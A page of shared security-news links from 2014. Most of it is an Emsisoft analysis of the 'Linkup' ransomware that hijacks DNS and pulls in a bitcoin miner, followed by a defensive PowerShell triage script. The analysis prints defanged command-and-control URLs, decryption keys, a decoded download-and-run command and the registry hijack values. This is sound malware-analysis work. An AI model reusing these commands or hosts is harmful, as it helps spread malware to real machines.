
Security in the skies: production of the legendary Su aircraft is protected by Kaspersky Lab
2014-02-03 16:59

KMM shared a link

Kaspersky Lab announces the start of cooperation with one of Russia's leading aviation companies, JSC Sukhoi Company.


Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins
2014-02-03 17:15

KMM shared a link

Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.

“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files.  Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.

Protecting Yourself from Linkup

Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup.  Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.

[Screenshot: the Linkup lock page shown in the browser]

What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage.  The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie.  Do not submit any personal information!  If your computer has been infected, we advise you to find another means of connecting to the Internet and contacting Emsisoft Support to assist you with removal.

How Linkup Works

Once the Linkup Trojan has been executed, it makes a copy of itself in the %AppData%\Microsoft\Windows directory under the name svchost.exe, a fake name meant to mimic the legitimate svchost.exe that lives in %windir%\system32. To mark its presence in the system, Linkup creates a mutex named tnd990r or tnd990s. We have also found that Linkup disables selected Windows Security and Firewall services to facilitate infection.

[Screenshot: Windows Security and Firewall services disabled by Linkup]

Once established on your PC, Linkup contacts its server to provide it with data related to your machine.  It does this by sending a POST request to the following address, transmitted in an encrypted state.

[Screenshot: the encrypted POST request to the server]

What kind of data is Linkup sending its server? When decrypted, the "token" value looks like this:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

That is your unique user id (uid), your version of Windows (ver), and the language you are using, in this case ENU, or United States English. This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.

Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:

hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup decrypts the string with the following key:

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t

[Screenshot: decrypting the body string]

Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

This key translates commands from Linkup's server so that the malware can perform them. Upon initial connection, the very first command that is sent looks like this:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup decrypts this command using its key, turning it into this:

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe

[Screenshot: decryption of the first command]

The first command (IL 62.75.221.37) redirects every HTTP request to the ransomware website, hosted at 62.75.221.37 under the address hxxp://62.75.221.37/worlds/test/index.html. From this point on, Linkup redirects your DNS so that you end up at the ransomware site whenever you browse.

To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
    "NameServer" = "127.0.0.1"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
    "DhcpNameServer" = "127.0.0.1"

Linkup then finalizes this action by refreshing various Internet/connectivity component settings, so that the changes it made take effect immediately. It does this by running the following commands:

[Screenshot: the network refresh commands run by Linkup]

This redirect is malicious enough, but what is so interesting about Linkup is that it does not stop there. Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe. This command instructs your computer to download and run the file pts2.exe. What is pts2.exe? A downloader designed to connect your computer to a Bitcoin mining botnet!

Bitcoin Mining Botnet?

The technical processes behind "Bitcoin mining" are complex. For a good summary, consider reading Ken Tiddel's "Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995," or Emsisoft's Attack on Bitcoins.

In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins.  That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.

Pts2.exe is a downloader, and it is placed in the same directory as the fake svchost.exe file we started this analysis with. On disk it is actually stored under the name Update_%random%.exe. This is a .NET based file designed to download another file from hxxp://64.32.28.155/b.exe, store it as C:\Users\Public\b.exe, and execute it.

[Screenshot: the pts2.exe downloader]

Upon further analysis, our malware team identified this "other file" to be a self-extracting RAR that extracts several script files and one executable. The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer. As the name suggests, jhProtominer is a Bitcoin mining application.

This combination of ransomware and Bitcoin mining is a new and fascinating development.  At this point, however, its functionality is still quite limited as the downloaded jhProtominer only works on 64-bit operating systems.  In time, it will be interesting to see if Linkup is modified to download more flexible variants.
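A host triage check for the indicators this analysis describes (the NameServer registry hijack, the dropped svchost.exe / Update_%random%.exe / b.exe files, and the tnd990r / tnd990s mutexes), as an added PowerShell example that is not part of the Emsisoft article. It assumes an elevated PowerShell 4 or later session on the suspect machine, and it assumes the mutexes may live in either the session-local or the Global namespace, which the article does not specify.

```powershell
# Added host triage script for the Linkup indicators described in this article
# (not Emsisoft's code). Assumes an elevated PowerShell 4+ session on the suspect
# Windows host; it only reports what it finds and changes nothing.
$findings = @()

# 1. DNS hijack: NameServer / DhcpNameServer on any interface pointed at 127.0.0.1
$ifaceKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces'
foreach ($iface in Get-ChildItem -Path $ifaceKey) {
    $props = Get-ItemProperty -Path $iface.PSPath
    foreach ($name in 'NameServer', 'DhcpNameServer') {
        $value = [string]$props.$name
        if ($value -match '(^|[ ,])127\.0\.0\.1($|[ ,])') {
            $findings += "DNS: interface $($iface.PSChildName) has $name = '$value'"
        }
    }
}

# 2. Dropped files: the fake svchost.exe outside System32, the .NET downloader
#    stored as Update_<random>.exe, and the self-extracting miner package b.exe
$dropDir = Join-Path $env:APPDATA 'Microsoft\Windows'
$paths = @((Join-Path $dropDir 'svchost.exe'), 'C:\Users\Public\b.exe')
$paths += @(Get-ChildItem -Path $dropDir -Filter 'Update_*.exe' -ErrorAction SilentlyContinue |
            Select-Object -ExpandProperty FullName)
foreach ($file in $paths) {
    if ($file -and (Test-Path -LiteralPath $file)) {
        $sha1 = (Get-FileHash -LiteralPath $file -Algorithm SHA1).Hash
        $findings += "File: $file SHA1=$sha1"
    }
}

# 3. Infection marker: a running instance holds the tnd990r or tnd990s mutex.
#    Checking both the session-local and Global namespaces is an assumption;
#    the article does not say which one Linkup uses.
foreach ($mutexName in 'tnd990r', 'tnd990s', 'Global\tnd990r', 'Global\tnd990s') {
    try {
        $mutex = [System.Threading.Mutex]::OpenExisting($mutexName)
        $mutex.Dispose()
        $findings += "Mutex: $mutexName is present"
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        # not present: nothing to report
    } catch [System.UnauthorizedAccessException] {
        $findings += "Mutex: $mutexName exists but is owned by another account"
    }
}

if ($findings.Count -eq 0) { Write-Host 'No Linkup indicators found' }
else { $findings | ForEach-Object { Write-Warning $_ } }
$findings
```

A NameServer value of 127.0.0.1 on a host that runs no local resolver is the most reliable of these signals; the file checks only confirm an infection when the SHA1 matches a known sample.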

Hashes of files analyzed in this article


What do you think about Linkup?

In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money making malware.

If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place.  In the meantime, steer clear of the mines, and have a great (ransomware-free) day!


Browser plugin update for Dr.Web Enterprise Security Suite 6.0.4
2014-02-03 21:24

KMM shared a link

3 February 2014

Doctor Web announces an update of the plugins (6.00.01240) for the Google Chrome and Mozilla Firefox browsers in the Dr.Web Enterprise Security Suite 6.0.4 Control Center, as well as a fix for the plugin's operation with MS Internet Explorer 11. The update addresses identified bugs.

The updated plugins fix a problem with installing anti-virus agents over the network through the Control Center, which occurred when non-Latin characters were entered in the "Executable file" field using Google Chrome or Mozilla Firefox.

For correct operation of the plugin with MS Internet Explorer 11, fixes have been released together with instructions for applying them.

The updated plugins must be downloaded from the Doctor Web website.
